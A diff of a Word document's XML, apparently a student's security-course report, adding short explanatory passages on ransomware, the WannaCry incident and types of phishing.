           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">Last class of the week, we had a theory about security and the different types of attacks. </w:t>
       </w:r>
@@ -1534,6 +2245,17 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -1542,33 +2264,1564 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc113407013"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc113747824"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+        <w:t>Exercises &amp; Challenges</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Path Traversal </w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="3"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        <w:t>Task: To get a better understanding of these threats and attacks find articles on internet about any malware.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc113747825"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ransomware</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="4"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">Ransomware is one of the most popular cyber-attacks around the world. It is used to damage as many systems as possible. It encrypts the data in the infected system, this encourages the attacker to ask for money to decrypt the data. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This malware spreads rapidly by itself without needing an attacker to manage it. Nobody can expect how fast it would spread to other systems. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>WannaCry Attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>On May 12, 2017, the UK detected a ransomware called Wanacrypt0r. It affected the hospitals in the UK. After that, it went across the globe, infecting thousands of systems in at least 150 countries.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>What did the attacker want?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The attacker promised to decrypt the data after receiving 300$ in Bitcoin. The hackers usually tend to use Bitcoin to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>get</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the money</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to prevent the banks and governments to trace </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the money transfers. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>What did the attacker damage?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>The attack spread rapidly. It infected so many sectors. These included:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Healthcare</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Emergency</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Security</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Telecom</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Gas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Petrol</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Automotive</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Education </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Advertising</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Who was responsible for WannaCry?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The United States </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">officially blames North Korea for this attack. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc113747826"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Phishing</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Phishing is one of the social engineering methods to conduct an attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Social engineering is a term used to describe the attacks that take place by tricking the human to do something that leads to a vulnerability. It is when the attacker aims to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>trick</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the user to click on a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">malicious </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>link</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Phishing types:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">General Phishing </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">is a simple attack where the target </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>can be anybody that uses popular services like PayPal, Amazon, Steam, etc.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Spearphishing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>targets small group. However, that group might have security experience because they know that they can be targeted anytime.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Whaling</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>is so specific that it only targets the big names in a company. Well designed and crafted emails are being used for in this type.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Let us take a deep look at the general phishing type which is the most popular. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>The attacker sends out an email that contains a malicious code.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>The user (victim)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sees the email and thinks that they should log in and do something about it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>The website retrieves the user credentials and forward them to the attacker.</w:t>
